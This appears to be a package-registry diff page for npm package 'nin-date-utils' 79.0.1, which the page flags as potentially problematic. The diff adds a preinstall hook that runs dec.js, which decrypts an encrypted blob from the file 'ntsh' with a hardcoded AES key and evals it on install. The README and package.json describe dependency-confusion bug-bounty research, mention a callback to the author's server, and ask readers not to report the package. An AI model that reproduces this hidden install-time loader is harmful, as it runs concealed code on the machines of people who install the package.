nin-date-utils 79.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of nin-date-utils might be problematic. Click here for more details.
- package/README.md +13 -0
- package/dec.js +1 -0
- package/index.js +0 -0
- package/ntsh +1 -0
- package/package.json +12 -0
package/README.md
ADDED
@@ -0,0 +1,13 @@
|
|
1
|
+
# Bug Bounty Research Only
|
2
|
+
|
3
|
+
Please note the above snyk.io! We're on the same side, if you keep marking these as malicious I'll give up on bounties and the world will be that much less secure.
|
4
|
+
|
5
|
+
My email address: contact@bugbounty.click
|
6
|
+
|
7
|
+
This package was created for ethical hacking purposes only. https://hackerone.com/nintendo-server?type=team If you're reading this, then if I was a malicious hacker then I could have control over your machine. Please see https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 for the technical description if you are interested. However, please don't report this package to the NPM registry as I have created it for bug bounty purposes.
|
8
|
+
|
9
|
+
For example, as you can see here the vulnerability has been reported to Hacker1 and been rewarded for (note this is not my report): https://hackerone.com/reports/1104693
|
10
|
+
|
11
|
+
If this has broken something then I'm sorry - however, please contact your internal security department/bug bounty administrator and pass on this message and email address. If you leave this on NPM and I receive a callback to my server at https://bugbounty.click then I can prove the vulnerability, and once it is reported it can be fixed before anyone malicious exploits it for bad. I hope I have made myself clear, please report this to your organisational security team.
|
12
|
+
|
13
|
+
Thank you - bugbounty.click
|
package/dec.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const e=require("crypto"),r="aes-256-ctr",t="vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3",c=c=>{const f=e.createDecipheriv(r,t,Buffer.from(c.iv,"hex"));return Buffer.concat([f.update(Buffer.from(c.content,"hex")),f.final()]).toString()};module.exports={decrypt:c};const f=require("fs");f.readFile("ntsh",((e,r)=>{eval(c(JSON.parse(r)))}));
|
package/index.js
ADDED
File without changes
|
package/ntsh
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
{"iv":"0a41100bfcf283bd6d8261aee4505782","content":"f0027144abe8f34e52ea3fb5fcdc43eacbd5841f2923512c86b458134a3fdbefdc30dd43c0f2bcd4636eab901bfb5d96b96fe3841a3807564827f1cccdcb5c8de4599b9421bcc0211e40225bee65caf9ea81db84a8289a7a34bb763fdb8dcdb8a4cc5da69e6979afa33e5df23b6be045438241579a9d91e88adbcb906f689ca269c28ae340954cbec680544c703d5a71f377f761d3f33306ad8843999209cb5f3733e4edfa521393bcbd9efc9e97b3524bd1aac8e869e7fc251301c558fa57ae78e751d44e0de84ce22787a5e69e594045250271ef38373c23c7b91c62fea92cfb4cd8435edf1aed27d2f9d8e7bbbc5631fc8c2dfee8fb46920325211ce68d9b98e8e288cd4e1ce3db0c8338bfe673a5da723ed06cbbed9e1c4ba4e4c4989d3862c2d7628f53f1e734282aafc0c72db3f712476d939e92388325a27bfa96faf2d57f38ec31789c1ebba78ddc62a7c93dab6182fd305939bb78efeee498e7d3a7a9657fabe08677cbf8502ce9eb76c4ac8f583bf9c74f8784c964f0e67d20e8f572e1960d445225b30c6f020ed46d80843bebe856a89b22530cc43a0a05aac0c3737b6d6752641417cb23ef4c25a7b34006565bc1d6e651ef7d24b5c6604e889b5333043a5e0da3b2e4e84cd12c47d693ad52066e8321d3d9e417caaf7dc42602af3c0b757a89908132abcc100ca45881245fe9994e0e1129ce01357eefe5a13a38a29025da19692427621fdbc20bb7f555dda04a85d274af1e5677ec09a70451ca06b528b141708972361db08a4eb2ea3bb006fc9b718cb386658c8e060011c851e4001a871ac693bc20f77bde68b68db09a9485c9235280611653a2a727a69c504b8f8ec5479d1429325ca3ac605031d8b08cab956de51b2658573a55e473fd797564fc5fc261413ab0c6a99ec125fa784220f650cc75fe52cdeb300e3e428d3a34113225751c87d9027f4fd4c1b91c608f31dd49a82bf3827fbeadb29676e9251a9fa4cb6365b5aceeb2d226379a89321889b54130c458bb6b6f219ec1be577326544d295c81add731468a6f993f63779c6e34140a2798d0c4b5eb45dcf638e4ad36d4ab2582a07055a8cd58b4fc5e4afd0927ad24490602369920d89a45af0c34049c1c1248613c5b0c86b4b700b59dcbc8d501c835ca40adfd555ff46d3fc51d71d62b3429e7f312557b921131243c3dc33f3310d6131e67c020725a3e08a520290558dbeb065b4b8621039f74b0dcfc08d20c4e20e8bb5d238bd6b7952f13f729bcf34dce527b74145f63839d5560b35fa655caee2150c3aaeb076d8410b47341e49ad038efafa5c2204296bba7b65d7fcc05e6255e902b820bc482482a480a4e25167e70aaa2a63eb4c62d0f9a2f0977628aaf362421630e0deb6dcaa5f3f8bba70bc10aebaadb4f5b14db45a54bf7edcf273ee377011353a226ae7c0450c7ad04380a720c0b3853dc04062bb4d75d48c0de61a690bc52535088e4e5407075ceb7b3adad483201267a4d76d8eb6949847a036ec4368a95c5eeef422183de3ee737542cb8ca6c780cab2c919364b5146d0bc2d8b37f9ef8ba1aa3ff24af25ce5e98753e78ea8dacb30e8724e3ad79a6974afc7d28f46b8e13f399d9aba35f0a8359314a58b0da3d3a33aa0d19976a029910bb99d56e92b1883aeb7af29418fc1f1a3f10a7c02634348c3b0e489d4a95e45024819cf57a21ef44485920d9b4c7bb14b0dbb85087a34eeca7597bc6937f2c7459f7323a6c1f85e56408fdb6b919a7ed7795adb87a8a2fa112c30d4f2a0be3c461955744f58785c9478d5ab7705dcc69aab6acd955ed56161e57fe9021eb7ea4f96578de81bcc02bd933fe297caba23f5e1067a9b15baefe2dd14323e97c67"}
|
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "nin-date-utils",
|
3
|
+
"version": "79.0.1",
|
4
|
+
"description": "My email address: contact@bugbounty.click - This package was created for ethical hacking purposes only. https://hackerone.com/nintendo-server?type=team - back off synk, if this was malicious I'd have a shell by now. We're on the same side, leave my bounties alone please. If you're reading this, then if I was a malicious hacker then I could have control over your machine. Please see https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610 for the technical description if you are interested. However, please don't report this package to the NPM registry as I have created it for bug bounty purposes. For example, as you can see here the vulnerability has been reported to Hacker1 and been rewarded for (note this is not my report): https://hackerone.com/reports/1104693 If this has broken something then I'm sorry - however, please contact your internal security department/bug bounty administrator and pass on this message and email address. If you leave this on NPM and I receive a callback to my server at https://bugbounty.click then I can prove the vulnerability, and once it is reported it can be fixed before anyone malicious exploits it for bad. I hope I have made myself clear, please report this to your organisational security team. Thank you - bugbounty.click",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node dec.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|